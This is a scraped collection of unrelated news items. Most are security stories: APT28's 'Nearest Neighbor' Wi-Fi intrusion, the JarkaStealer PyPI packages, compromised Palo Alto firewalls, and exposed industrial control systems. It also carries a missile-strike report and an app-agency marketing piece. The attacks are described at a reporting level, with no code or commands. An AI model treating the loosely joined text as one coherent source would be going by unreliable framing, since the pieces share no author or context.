In a "new class of attack," the Russian APT breached a target in Washington, DC, by credential-stuffing wireless networks in close proximity to it and daisy-chaining a vector together in a resourceful and creative way, according to researchers.

Source: Science Photo Library via Alamy Stock Photo

A sophisticated cyber-espionage attack used by notorious Russian advanced persistent threat (APT) Fancy Bear at the outset of the current Russia-Ukraine war demonstrates a novel attack vector that a threat actor can use to remotely infiltrate the network of an organization far away by compromising a Wi-Fi network in close proximity to it.

Fancy Bear (aka APT28 or Forest Blizzard) breached the network of a US organization using this method, which the researchers at Volexity are calling a "Nearest Neighbor" attack.

"The threat actor accomplished this by daisy-chaining their approach, to compromise multiple organizations in close proximity to their intended target, Organization A," Volexity researchers Sean Koessel, Steven Adair, and Tom Lancaster wrote in a post detailing the attack. "This was done by a threat actor who was thousands of miles away and an ocean apart from the victim."

The hack demonstrated "a new class of attack" for an attacker so far away from the intended target to use the Wi-Fi method, the researchers said. Volexity tracks Fancy Bear — a part of Russia's General Staff Main Intelligence Directorate (GRU) that's been an active adversary for at least 20 years — as "GruesomeLarch," one of the APT's many names.

Volexity first discovered the attack just ahead of Russia's invasion of Ukraine in February 2022, when a detection signature Volexity had deployed at a customer site indicated a compromised server. Eventually, the researchers would determine that Fancy Bear was using the attack "to collect data from individuals with expertise on and projects actively involving Ukraine" from the Washington, DC-based organization.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

**A Cyberattack Chained Through Multiple Orgs**

The attack involved Fancy Bear performing credential-stuffing attacks to compromise at least two Wi-Fi networks in close physical proximity to the target. The attacker then used credentials to compromise the organization, since credential-stuffing attacks alone couldn't compromise the targeted organization's network due to the use of multifactor authentication (MFA), according to Volexity.

"However, the Wi-Fi network was not protected by MFA, meaning proximity to the target network and valid credentials were the only requirements to connect," the researchers wrote.

Ultimately, the investigation revealed "the lengths a creative, resourceful, and motivated threat actor is willing to go to in order to achieve their cyber-espionage objectives," they wrote.

During the course of a lengthy investigation, Volexity worked with not only with the targeted organization but also connected with two other organizations (aka Organizations B and C) that were breached to eventually reach the target.

Related:Ransomware Attack on Blue Yonder Hits Starbucks, Supermarkets

Ultimately, Volexity discovered an attack structure to breach Organization A that used privileged credentials to connect to it via the Remote Desktop Protocol (RDP) from another system within Organization B's network.

"This system was dual-homed and connected to the Internet via wired Ethernet, but it also had a Wi-Fi network adapter that could be used at the same time," the researchers explained in their post. "The attacker found this system and used a custom PowerShell script to examine the available networks within range of its wireless, and then connected to Organization A's enterprise Wi-Fi using credentials they had compromised."

Moreover, the APT also used two modes to access to Organization B's network to gain intrusion to the ultimate target, the researchers discovered. The first was using credentials obtained via password-spraying that allowed them to connect to the organization's VPN, which was not protected with MFA. Volexity also found evidence the attacker had been connecting to Organization B's Wi-Fi from another network that belonged to nearby Organization C, demonstrating the daisy-chain approach to the attack, the researchers wrote.

Related:Yakuza Victim Data Leaked in Japanese Agency Attack

Throughout the attack, Fancy Bear adopted a living-off-the-land approach, leveraging standard Microsoft protocols and moving laterally throughout the organization. One tool in particular that they made particular use of was an inbuilt Windows tool, Cipher.exe, that ships with every modern version of Windows, the researchers found.

**Beware Thy (Wi-Fi) Neighbors**

Because the attack highlights a new risk for organizations of compromise through Wi-Fi even if an attacker is far away, defenders "need to place additional considerations on the risks that Wi-Fi networks may pose to their operational security," treating them "with the same care and attention that other remote access services, such as virtual private networks (VPNs)," the researchers observed.

Recommendations for organizations to avoid such an attack include creating separate networking environments for Wi-Fi and Ethernet-wired networks, particularly where Ethernet-based networks allow for access to sensitive resources. They also should consider hardening access requirements for Wi-Fi networks, such as applying MFA requirements for authentication or certificate-based solutions.

To detect a similar attack once the threat actor achieves presence on the network, organizations should consider monitoring and placing an alert on anomalous use of the common netsh and Cipher.exe utilities. Defenders also can create custom detection rules to look for files executing from various nonstandard locations, such as the root of C:\\ProgramData\\, and improve detection of data exfiltration from Internet-facing services running in an environment.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Fancy Bear 'Nearest Neighbor' Attack Uses Nearby Wi-Fi Network

A list of topics we covered in the week of November 18 to November 24 of 2024

November 25, 2024 - Cybercriminals are spamming content platforms like Spotify and Amazon with cracks, keygens, and forex trading platforms. We explain why.

November 25, 2024 - Hacktivists have breached Andrew Tate's learning platform The Real World and obtained 794,000 usernames for current and former members, as well as 324,382 email addresses of former clients.

November 22, 2024 - Meta provided some insight into their fight against pig butchering scammers, who are often victims of organized crime themselves

November 20, 2024 - People are receiving disturbing emails that appear to imply something has happened to their friend or family member.

November 20, 2024 - Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.

 A week in security (November 18 &#8211; November 24) 

This is the first time Russia has used its so-called Oreshnik intermediate-range ballistic missile in combat. The launch also serves as a warning to the West.

Two days ago, Russian president Vladimir Putin announced a change in the country's policy for employing nuclear weapons in conflict. Then, on Thursday, Russia attacked the Ukrainian city of Dnipro with a new type of ballistic missile capable of one day delivering multiple nuclear warheads to distant targets with little warning.

Putin says his ballistic missile attack on Ukraine is a warning to the West.

These events are just part of what has been a week of escalation in the war between Russia and Ukraine. In recent days, Ukraine fired US-made ATACMS tactical ballistic missiles and UK-supplied Storm Shadow missiles at targets in Russian territory for the first time. This followed approval by President Joe Biden for Ukraine to use US-provided longer-range missiles against Russian targets. Previously, Ukraine was only permitted to use them on its own territory.

In a rare televised statement Thursday, Putin said he ordered Russia's military to strike Dnipro, home to Soviet-era rocket factories, using a ballistic missile named Oreshnik. This means “hazelnut tree” in Russian. The attack was the first use of the Oreshnik missile “under combat conditions,” Putin said.

Videos from Dnipro posted on social media show multiple projectiles exploding as they impact the ground at high speed. Local residents in Dnipro said the Oreshnik missile struck an industrial plant operated by PA Pivdenmash, formerly known as Yuzhmash. The PA Pivdenmash factory previously manufactured booster stages for the Soviet-era Zenit rocket and, most recently, first-stage tanks for the US-operated Antares rocket for Northrop Grumman.

**Threats From the Kremlin**

Sabrina Singh, the Pentagon's deputy press secretary, called the weapon used Thursday an “experimental intermediate-range ballistic missile” based on Russia's RS-26 Rubezh intercontinental ballistic missile model. While the strike before dawn Thursday used conventional munitions, the impact of multiple projectiles suggests the missile employed multiple reentry vehicles, or MIRVs, similar to the way Russia might use the missile in a nuclear attack.

Singh said the missile could be refitted with different types of conventional or nuclear warheads. She said Russia notified the US government of the planned attack “briefly” before it happened through nuclear risk-reduction channels.

Ukrainian government officials initially said the attack on Dnipro was by an ICBM rather than an intermediate-range weapon, or IRBM.

ICBMs typically follow long, arcing trajectories that take the missiles into space, above the discernible atmosphere, as they travel to faraway targets. An intermediate-range missile, classified as a weapon that can travel between 3,000 and 5,500 kilometers, could also reach space, although the exact altitude reached by the Oreshnik missile was unknown Thursday.

“An IRBM and an ICBM, they can have similar flight paths. They can have high trajectories,” Singh said. “They can carry large payloads, but the main difference lies in the range and the strategic purpose.”

The Oreshnik missile launched Tuesday apparently took off from Russia’s Kapustin Yar rocket base roughly 800 kilometers from Dnipro, well away from intense fighting.

This is the first time any IRBM has been used in combat. The Intermediate-Range Nuclear Forces Treaty, ratified by the United States and the Soviet Union in 1988, banned ground-launched IRBMs. The US pulled out of the treaty in 2019 under the first Trump administration, citing noncompliance from Russia. At the time, US officials noted that China, which was not a signatory to the treaty, possessed more than 1,000 IRBMs in its arsenal.

Putin said Western air defenses are not capable of destroying the Oreshnik missile in flight, although this claim can't be verified. He said Russia would provide warnings to Ukraine in advance of similar missile attacks in the future to allow civilians to escape danger zones.

The Oreshnik missiles strike their targets at speeds of up to Mach 10, or 2.5 to 3 kilometers per second, Putin said. “The existing air defense systems around the world, including those being developed by the US in Europe, are unable to intercept such missiles.”

**A Global War?**

In perhaps the most chilling part of his remarks, Putin said the conflict in Ukraine is “taking on global dimensions” and said Russia is entitled to use missiles against Western countries supplying weapons for Ukraine to use against Russian targets.

“In the event of escalation, we will respond decisively and in kind,” Putin said. “I advise the ruling elites of those countries planning to use their military forces against Russia to seriously consider this.”

The change in nuclear doctrine authorized by Putin earlier this week also lowers the threshold for Russia’s use of nuclear weapons to counter a conventional attack that threatens Russian “territorial integrity.”

This seems to have already happened. Ukraine launched an offensive into Russia’s Kursk region in August, taking control of more than 1,000 square kilometers of Russian land. Russian forces, assisted by North Korean troops, are staging a counteroffensive to try to retake the territory.

Singh called Russia’s invitation of North Korean troops “escalatory” and said Putin could “choose to end this war today.”

US officials say Russian forces are suffering some 1,200 deaths or injuries per day in the war. In September, The Wall Street Journal reported that US intelligence sources estimated that a million Ukrainians and Russians had been killed or wounded in the war.

The UN Human Rights Office most recently reported that 11,973 civilians have been killed, including 622 children, since the start of the full-scale Russian invasion in February 2022.

“We warned Russia back in 2022 not to do this, and they did it anyways, so there are consequences for that,” Singh said. “But we don't want to see this escalate into a wider regional conflict. We don't seek war with Russia.”

_This story originally appeared on_ _Ars Technica._

Russia’s Ballistic Missile Attack on Ukraine Is an Alarming First

New York, the city that never sleeps, is renowned as a global epicentre for innovation, creativity, and business…

New York, the city that never sleeps, is renowned as a global epicentre for innovation, creativity, and business excellence. While it’s best known for its financial district, cultural landmarks, and media industry, New York has also emerged as a thriving cybersecurity, technology and app development hub.

Mobile app development companies in New York are at the forefront of delivering innovative solutions, driven by the city’s unique combination of resources, talent, and opportunity. Here’s why New York is a prime location for leading mobile development agencies.

****1\. Access to a Diverse Talent Pool****

New York is home to some of the world’s most prestigious universities and tech programs, including Columbia University, NYU, and Cornell Tech. These institutions produce highly skilled graduates in technology, design, and software engineering.

**Why It Matters:** Mobile app development companies in New York benefit from access to top-tier talent across various disciplines, ensuring they can assemble teams with diverse expertise. This diversity fosters creativity and innovation, critical for building cutting-edge mobile applications.

****2\. Thriving Tech Ecosystem****

New York’s Silicon Alley has grown into a vibrant tech ecosystem, attracting startups, established tech companies, and venture capitalists. This environment creates opportunities for collaboration, knowledge sharing, and investment in new ideas.

**Why It Matters:** Mobile development agencies in the city are well-connected to this tech network, allowing them to leverage the latest tools and technologies. This ecosystem also provides opportunities to partner with other innovative businesses, further enhancing their service offerings.

****3\. Exposure to Multiple Industries****

New York is a global leader in industries such as finance, healthcare, fashion, real estate, and media. Each sector has specific needs for mobile applications, from e-commerce platforms to health monitoring tools.

**Why It Matters:** The wide range of industries in New York challenges mobile app development companies to adapt and innovate constantly. By working with clients across diverse sectors, these agencies gain valuable experience and insights that make their solutions more versatile and effective.

****4\. Strong Focus on Innovation and Creativity****

As a cultural melting pot, New York is known for its dynamic and creative energy. This culture of innovation extends to the tech industry, where agencies are encouraged to think outside the box and develop groundbreaking mobile solutions.

**Why It Matters:** Mobile app development companies in New York are uniquely positioned to combine technical expertise with creative problem-solving. This results in apps that are not only functional but also visually appealing and user-friendly.

****5\. Access to a Global Market****

New York’s status as an international hub makes it a gateway to global markets. Companies based in the city have the advantage of working with clients from around the world, giving them a broader perspective on user needs and preferences.

**Why It Matters:** Mobile app development companies in New York design solutions that cater to diverse audiences. Their global outlook allows them to incorporate features that appeal to users across different cultures and regions, making their apps more competitive on a worldwide scale.

****6\. Cutting-Edge Use of Emerging Technologies****

The city’s tech agencies are at the forefront of integrating emerging technologies such as artificial intelligence, augmented reality, blockchain, and IoT into mobile applications.

**Why It Matters:** By embracing these innovations, New York-based companies deliver apps that are future-proof and highly functional. This proactive approach ensures that their clients stay ahead of the competition and meet evolving market demands.

****7\. Networking Opportunities and Events****

New York hosts numerous tech conferences, meetups, and hackathons, providing opportunities for professionals to connect, learn, and share ideas. Events like TechDay NYC and the NY Tech Meetup attract thought leaders and innovators from across the globe.

**Why It Matters:** These events help mobile app development companies stay updated on industry trends and best practices. Networking opportunities also enable them to forge partnerships that enhance their capabilities and broaden their client base.

****8\. Strong Support for Startups and Enterprises****

New York’s robust economy supports both startups and established enterprises, creating a thriving market for mobile app development. The city offers resources like incubators, accelerators, and funding opportunities to help businesses grow.

**Why It Matters:** Mobile development agencies in New York can cater to a wide range of clients, from ambitious startups looking to make their mark to large corporations aiming to enhance their digital presence. This versatility strengthens their expertise and reputation.

****Conclusion****

New York’s combination of talent, industry diversity, and technological innovation makes it a prime location for leading mobile development agencies. Mobile app development companies in New York thrive in an environment that encourages creativity, collaboration, and excellence, enabling them to deliver world-class solutions.

For businesses seeking to create impactful mobile apps, partnering with a New York-based agency ensures access to top-tier expertise and innovative technologies. As the city continues to drive advancements in the digital space, it remains a global leader in mobile app development.

1.  21 Best Amazon PPC Management Agencies
2.  Top SEO Agencies in the UK: Expert Insights
3.  The Idea of Web3 and 7 Global Web3 Agencies
4.  Kotlin app development company – How to choose
5.  Benefits of hiring a Java web appl development company
6.  5 Best Crypto Marketing Agencies for Web3 Security Brands

Why New York is a Prime Location for Leading Mobile Development Agencies

Plus: The worst telecom hack in US history rolls on, iPhones are harder to break into, and more of the week’s top security news.

A joint investigation by WIRED, Bayerischer Rundfunk (BR), and Netzpolitik.org uncovered that US companies legally collecting digital ad data are enabling adversaries to cheaply track American military and intelligence personnel. A collaborative analysis of billions of location coordinates from a US-based data broker revealed detailed tracking of thousands of devices from sensitive US sites in Germany, including NSA facilities and bases reportedly housing US nuclear weapons.

Elsewhere, social media giant Meta has disclosed for the first time its efforts to combat the forced-labor compounds driving the surge in pig butchering scams on its platforms. The company revealed that it has been quietly collaborating with global law enforcement, tech industry partners, and external experts for over two years to dismantle the crime syndicates behind these operations in Southeast Asia and the UAE. This year alone, Meta reports it has taken down more than 2 million accounts linked to scam compounds in Myanmar, Laos, Cambodia, the Philippines, and the UAE.

At the Cyberwarcon security conference on Friday, the cybersecurity firm SpyCloud shared findings about publicly accessible black market services offering low-cost access to sensitive information on Chinese citizens, including phone numbers, banking details, hotel and flight records, and even real-time location data. According to the firm’s researchers, these services seem to obtain their data through insiders within Chinese surveillance agencies and government contractors, who sell their access. Also at the conference, cybersecurity firm Volexity uncovered that a Russian hacking group has reportedly developed a novel Wi-Fi-hacking technique that involves taking control of a nearby laptop and using it as a bridge to infiltrate a targeted Wi-Fi network. Dubbed a “nearest neighbor attack,” the method was uncovered during a 2022 investigation by the firm into a network breach of an unnamed Washington, DC. client. And finally, researchers explored how the US is calling out foreign influence campaigns faster than they ever have—but there’s plenty of room for improvement.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

**“King of Toxic Masculinity” Gets Hacked**

Hacktivists have breached an online “educational platform” founded by the misogynistic right-wing influencer Andrew Tate reportedly revealing the email addresses of hundreds of thousands of users as well as the contents of the platforms’ private chat servers. Data from the hack, first reported by the Daily Dot, has now been published by the transparency nonprofit Distributed Denial of Secrets.

Andrew Tate, the so-called “king of toxic masculinity,” is currently under house arrest in Romania and faces two separate criminal charges, including allegations of forming an organized criminal group and trafficking women across Romania, the UK, and the US.

The compromised platform, a subscription-based service known as The Real World (formerly called Hustler's University), describes itself as a “global community” focused on “personal growth.” According to its website, members receive expert training, mentorship, and access to a wide range of educational courses for around $50 per month.

According to the Daily Dot, hacktivists announced their breach of the platform on Thursday by disrupting the course's main chatroom with a barrage of uploaded emojis while Tate was livestreaming an episode of his show _Emergency Meeting_ on Rumble. The emojis included a transgender pride flag, a feminist fist, an AI-generated image of Tate wrapped in a rainbow flag.

Data from the breach, verified by WIRED, includes more than 700,000 usernames and reportedly includes messages from 221 public and 395 private chat servers. An analysis by the Daily Dot reveals a mix of content within the chat logs, ranging from motivational quotes and personal progress updates to grievances about the “LGBTQ agenda.” WIRED is continuing to analyze the leaked material.

**The “Worst Telecom Hack in US History” Is Still Ongoing**

Chinese government hackers have infiltrated over a dozen US telecommunications companies in what a senior senator is calling the worst telecom breach in American history—and they’re still inside the networks. The hacking group, Salt Typhoon, has been able to eavesdrop on audio calls in real time and obtain millions of records of call and text metadata from targeted individuals, according to a Washington Post interview with Senator Mark Warner of Virginia, chairman of the Senate Intelligence Committee.

Fewer than 150 victims have been identified and notified by the FBI so far—most of them in the DC region—including president-elect Donald Trump, his vice president-elect, JD Vance, as well as people working for Vice President Kamala Harris and state department officials.

Warner said, however, that the effort was not directly election-related, as the hackers got into some telecom systems more than a year ago.

**Leaked Documents Show GrayKey Struggles to Access Modern iPhones**

Leaked documents obtained by 404 Media reveal that GrayKey, a phone-hacking tool used by law enforcement to extract data from devices in their possession, can at the moment only partially access information from modern iPhones running iOS 18.0 and 18.0.1.

While the precise details of exactly how Graykey operates are unknown, the tool reportedly brute-forces iPhone or Android passcodes to unlock them—essentially hacking the phone—allowing law enforcement to then access and extract encrypted device data. While the specific types of data accessible during a “partial” extraction are unclear, it likely includes unencrypted files and metadata, such as file sizes and folder structures.

The document provides context to an ongoing cat-and-mouse dynamic between forensic technology companies and mobile device manufacturers. With each new software update, tools like GrayKey are temporarily thwarted, prompting developers to quickly adapt their technology to catch up. At the moment it appears that they have not. This leak follows another report from 404 Media about a feature in iOS 18 called “inactivity reboot,” which forces devices to restart after four days of inactivity, adding another layer of difficulty for law enforcement attempting to access data on seized devices.

**Europe Probes Undersea Cable Sabotage**

European authorities are investigating suspected sabotage to two undersea fiber-optic cables: one linking Finland and Germany, and the other connecting Sweden and Lithuania. Russia—widely suspected as the likely perpetrator—denies involvement, dismissing the allegations as “ridiculous.”

The incident began on Sunday when two telecommunications companies detected traffic disruptions likely caused by physical damage to undersea cables. One of the affected cables, known as C-Lion—a vital 730-mile link between Finland and Central Europe—runs alongside other critical infrastructure, including gas pipelines and power lines.

By Wednesday, the Danish navy had reportedly intercepted a Chinese cargo ship in connection with the disruptions. The vessel, which had most recently docked in Russia before the incident, was near the damaged area at the time. It is now under investigation, with its crew being questioned about their possible involvement.

Andrew Tate’s ‘Educational Platform’ Was Hacked

Attackers are betting that the hype around generative AI (GenAI) is attracting less technical, less cautious developers who might be more inclined to download an open source Python code package for free access, without vetting it or thinking twice.

Source: Adrian Vidal via Alamy Stock Photo

Two Python packages claiming to integrate with popular chatbots actually transmit an infostealer to potentially thousands of victims.

Publishing open source packages with malware hidden inside is a popular way to infect application developers, and the organizations they work for or serve as customers. In this latest case, the targets were engineers eager to make the most out of OpenAI's ChatGPT and Anthrophic's Claude generative artificial intelligence (GenAI) platforms. The packages, claiming to offer application programming interface (API) access to the chatbot functionality, actually deliver an infostealer called "JarkaStealer."

"AI is very hot, but also, many of these services require you to pay," notes George Apostopoulos, founding engineer at Endor Labs. As a result, in malicious circles, there's an effort to attract people to free access, "and people that don't know better will fall for this."

**Two Malicious "GenAI" Python Packages**

About this time last year, someone created a profile with the username "Xeroline" on the Python Package Index (PyPI), the official third-party repository for open source Python packages. Three days later, the person published two custom packages to the site. The first, "gptplus," claimed to enable API access to OpenAI's GPT-4 Turbo language learning model (LLM). The second, "claudeai-eng," offered the same for ChatGPT's popular competitor, Claude.

Neither package does what it says it does, but each provide users with a half-baked substitute — a mechanism for interacting with the free demo version of ChatGPT. As Apostopoulos says, "At first sight, this attack is not unusual, but what makes it interesting is if you download it and you try to use it, it will kind of look like it works. They committed the extra effort to make it look legitimate."

Under the hood, meanwhile, the programs would drop a Java archive (JAR) file containing JarkaStealer.

JarkaStealer is a newly documented infostealer sold in the Russian language Dark Web for just $20 — with various modifications available for $3 to $10 apiece — though its source code is also freely available on GitHub. It's capable of all the basic stealer tasks one might expect: stealing data from the targeted system and browsers running on it, taking screenshots, and grabbing session tokens from various popular apps like Telegram, Discord, and Steam. Its efficacy at these tasks is debatable.

**Gptplus & claudeai-eng's Year in the Sun**

The two packages managed to survive on PyPI for a year, until researchers from Kaspersky recently spotted and reported them to the platform's moderators. They've since been taken offline but, in the interim, they were each downloaded more than 1,700 times, across Windows and Linux systems, in more than 30 countries, most often the United States.

Those download statistics may be slightly misleading, though, as data from the PyPI analytics site "ClickPy" shows that both — particularly gptplus — experienced a huge drop in downloads after their first day, hinting that Xeroline may have artificially inflated their popularity (claudeai-eng, to its credit, did experience steady growth during February and March).

"One of the things that \[security professionals\] recommend is that before you download it, you should see if the package is popular — if other people are using it. So it makes sense for the attackers to try to pump this number up with some tricks, to make it look like it's legit," Apostopoulos says.

He adds, "Of course, most average people won't even bother with this. They will just go for it, and install it."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Faux ChatGPT, Claude API Packages Deliver JarkaStealer

The 2024 elections were a high-water mark for naming and shaming threat actors from foreign governments. There’s still work to be done, though, on how to attribute disinformation campaigns most effectively.

Ahead of the the 2024 US elections, the US intelligence community and law enforcement were on high alert and ready to share information—both among agencies and publicly—as foreign malign influence operations emerged. Tech giants like Microsoft similarly sprang into action, collaborating with government partners and publishing their own information about election-related disinformation campaigns. The speed and certainty with which authorities were able to pin these efforts on threat actors in Russia, China, and Iran was unprecedented. But researchers also caution that not all attributions are created equal.

At the Cyberwarcon security conference in Arlington, Virginia, today, researchers from the Atlantic Council’s Digital Forensic Research Lab are presenting initial findings on the role of attribution in the 2024 US elections. Their research compares the impact of quickly naming and shaming foreign influence actors to other recent US elections in which government attribution was far less common.

“We’re building on a project that we did back in 2020 where there was a lot more context of concern that the Trump administration was not being forthcoming about foreign attacks,” says Emerson Brooking, director of strategy and resident senior fellow for DFRLab. “In contrast to 2020, now there was an abundance of claims by the US government of influence operations being conducted by different adversaries. So in thinking through the policy of attribution, we wanted to look at the question of overcorrection.”

In the lead-up to the 2016 US presidential election, Russia’s extensive influence operations—which included hack-and-leak campaigns as well as strategic disinformation—caught the US government by surprise. Law enforcement and the intelligence community were largely aware of Russia's digital probing, but they didn't have an extreme sense of urgency, and the big picture of how such activity could impact public discourse hadn't yet come into view. After Russia's hack of the Democratic National Committee in June that year, it took four months for the US Office of the Director of National Intelligence and the Department of Homeland Security to publicly attribute the attack to the Kremlin. Some officials had said in the weeks following the incident that formal confirmation from the US government might never come.

Even in the highly politicized landscape that followed, federal, state, and local collaboration around election security expanded dramatically. By 2020, the researchers say, 33 of the 84 influence operation attributions they studied related to the 2020 US elections, or about 39 percent, came from US intelligence or federal sources. And this year, 40 of the 80 the group tracked came from the US government. DFRLabs resident fellow Dina Sadek notes, though, that one important factor in assessing the utility of US government attributions is the quality of the information provided. The substance and specificity of the information, she says, is important to how the public views the objectivity and credibility of the statement.

Specific information confirming that Russia had manufactured a video that purported to show ballots being destroyed in Bucks County, Pennsylvania was a high-quality, useful attribution, the researchers say, because it was direct, narrow in scope, and came very quickly to minimize speculation and doubt. Repeated statements from the Office of the Director of National Intelligence's Foreign Malign Influence Center warning very broadly and generally about Russian influence operations is an example of the type of attribution that can be less helpful, and even serve to amplify campaigns that otherwise might not register with the public at all.

Similarly, in the lead-up to the 2020 elections, the researchers point out, statements from the US government about Russia, China, and Iran playing a role in Black Lives Matter protests may have been mismatched to the moment because they didn't include details on the extent of the activity or the specific objectives of the actors.

Even with all of this in mind, though, the researchers note that there was valuable progress in the 2024 election cycle. But with a new Trump administration coming into the White House, such transparency could start to trend in a different direction.

“We don’t want to come across like rearranging deck chairs on the _Titanic_, because the state of affairs that was is not the state of affairs that will be,” Brooking says. “And from a public interest perspective I think we got a lot closer on disclosure in 2024.”

The US Is Calling Out Foreign Influence Campaigns Faster Than Ever

The Shadowserver Foundation reports over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012…

The Shadowserver Foundation reports over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. Top targets: US & India.

Cybersecurity researchers at Shadowserver have revealed that approximately 2,000 **Palo Alto Networks** firewalls have been compromised. The breaches leverage two recently identified zero-day vulnerabilities in the company’s PAN-OS software. These vulnerabilities have been labeled as CVE-2024-0012 and CVE-2024-9474.

****The Vulnerabilities****

**CVE-2024-0012**: This vulnerability is an authentication bypass in the PAN-OS management web interface. It allows remote attackers to gain administrator privileges without authentication. This means attackers can tamper with firewall settings, making them more susceptible to further exploitation.

**CVE-2024-9474**: This flaw is a privilege escalation issue. Once exploited, it lets attackers execute commands with root privileges, giving them full control over the compromised firewall.

> Heads-up! Thanks to collaboration with the Saudi NCA we are now scanning & reporting Palo Alto Networks devices COMPROMISED as a result of a CVE-2024-0012/CVE-2024-9474 campaign. Found ~2000 instances compromised on 2024-11-20: dashboard.shadowserver.org/statistics/c… Top affected: US & India
> 
> — The Shadowserver Foundation (@shadowserver.bsky.social) November 21, 2024 at 9:45 AM

****Operation Lunar Peek – Ongoing Threat Activity****

Palo Alto Networks has **named** the initial exploitation of these vulnerabilities “Operation Lunar Peek.” Palo Alto Networks initially warned customers on November 8 about restricting access to their next-generation firewalls due to an unspecified remote code execution flaw.

Since then, the company has observed a notable increase in threat activity following the public release of technical insights by third-party researchers on November 19, 2024.

Unit 42, Palo Alto Networks threat intelligence team, assesses with moderate to high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available, which could lead to broader threat activity.

The company is currently investigating the ongoing attacks, which involve chaining these two vulnerabilities to target a limited number of device management web interfaces. The company has observed threat actors dropping malware and executing commands on compromised firewalls, indicating that a chain exploit is likely already in use.

****Recommendations for Users****

Palo Alto Networks has provided several recommendations to mitigate the risk:

*   **Monitor and Review:** Users should monitor for any suspicious or abnormal activity on devices with a management web interface exposed to the internet. After applying the patch, it is crucial to review firewall configurations and audit logs for any signs of unauthorized administrator activity.
*   **Patch Immediately:** Customers are advised to update their systems to receive the latest patches that fix CVE-2024-0012 and CVE-2024-9474. Detailed information about affected products and versions can be found in the Palo Alto Networks Security Advisories.
*   **Restrict Access:** To reduce the risk, Palo Alto Networks recommends restricting access to the management web interface to only trusted internal IP addresses. This is in line with their recommended best practice deployment guidelines.

****Expert Insights****

**Elad Luz**, Head of Research at Oasis Security, emphasizes the importance of immediate action even before patching. He advises affected customers to restrict access to the web management interface, preferably allowing only internal IPs. Luz also stresses the need to ensure that devices are free from any potential malware or malicious configurations after patching.

1.  Palo Alto Patches 0-Day Exploited by Python Backdoor
2.  Authentication bypass Flaw found in NATO approved firewall
3.  Critical RCE Vulnerability Puts 330,000 Fortinet Firewalls at Risk
4.  CISA Urges Patching of Palo Alto Networks’ Expedition Tool Flaw
5.  Backdoor account found in 100K+ Zyxel Firewalls, VPN Gateways

Operation Lunar Peek: More Than 2,000 Palo Alto Network Firewalls Hacked

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%.…

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%. Vulnerabilities in outdated protocols and exposed HMIs put critical infrastructure at severe risk, says Censys.

The Internet has revolutionized numerous industries, including manufacturing, energy, and water treatment. However, as more and more **industrial control systems** (ICS) are connected to the internet, they become increasingly vulnerable to cyberattacks. 

According to Censys’ annual State of the Internet Report, shared with Hackread.com, internet-exposed human-machine interfaces (HMIs) are the emerging new threat in ICS security. For your information, HMIs are the graphical interfaces used to monitor and control industrial systems.

The screenshot displays the HMI for a three-pump system, featuring options to monitor alarms, manage controls, and adjust system setpoints (Image credit: Censys).

Researchers at Censys, a leading internet intelligence company, observed that HMIs have become increasingly connected to the internet to enable remote access and management. This connectivity has opened the door to cyberattacks. This is concerning as in 2023 and 2024, we witnessed a series of attacks targeting internet-exposed HMIs, demonstrating the potential for significant disruption and damage.

One notable attack was carried out by the CyberAv3ngers, an Iranian hacking group, **who targeted** a water treatment facility in Pennsylvania, exploited a vulnerable HMI to gain control of the system and defaced it with an anti-Israel message. Another significant attack was from the Cyber Army of Russia Reborn, which **attacked** water facilities in Texas, manipulating HMIs to cause water storage tanks to overflow.

Censys’ report reveals that there are over 145,000 exposed ICS services worldwide, and over 40,000 Internet-connected ICS located in the United States with over half of them linked to building control and automation protocols.

“38% of these services are in North America, 35% are in Europe, and 22% are in Asia. The U.S. alone is responsible for over one-third of global ICS service exposures,” Censys’ **report** read.

The study also found that 18,000 exposed devices were more likely to control industrial systems. In the UK, approximately 1,500 control systems exposed on the public Internet were identified through scans of 18 automation protocols. Over 80% of these administration interfaces are for building controls.

Additionally, over 50% of hosts running low-level automation protocols are concentrated in ISPs, while over 80% of hosts running exposed HMIs are found in wireless networks like Verizon and AT&T. Moreover, about half of the HMIs associated with Water and Wastewater could be manipulated without authentication.

These exposed systems become a tempting target for cybercriminals and nation-state actors who could potentially disrupt critical infrastructure.

Researchers have also observed a high prevalence of outdated and insecure protocols. Many of these protocols, such as Modbus, S7, and IEC 60870-5-104, are decades old and lack advanced security features. Researchers discovered nearly 200 hosts running HMIs that were also running products from vendors explicitly prohibited by the US’s National Defense Authorization Act (NDAA) Section 889. 

The report highlights the need for operators to be mindful of what products and software they allow to run alongside industrial processes. Researchers recommend that security teams must examine the exposure of these protocols and HMIs, which for a vital component of the security of industrial control systems.

1.  **Malware can fully compromise building control systems**
2.  **Flaws can let hackers physically damage moving bridges**
3.  **Flaws in US Drinking Water Systems Put 26 Million at Risk**
4.  **Propump and Controls’ Osprey Pump Controller vulnerable**
5.  **Ransomware targeted SCADA systems of 3 US water facilities**

US and Europe Account for 73% of Global Exposed ICS Systems

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

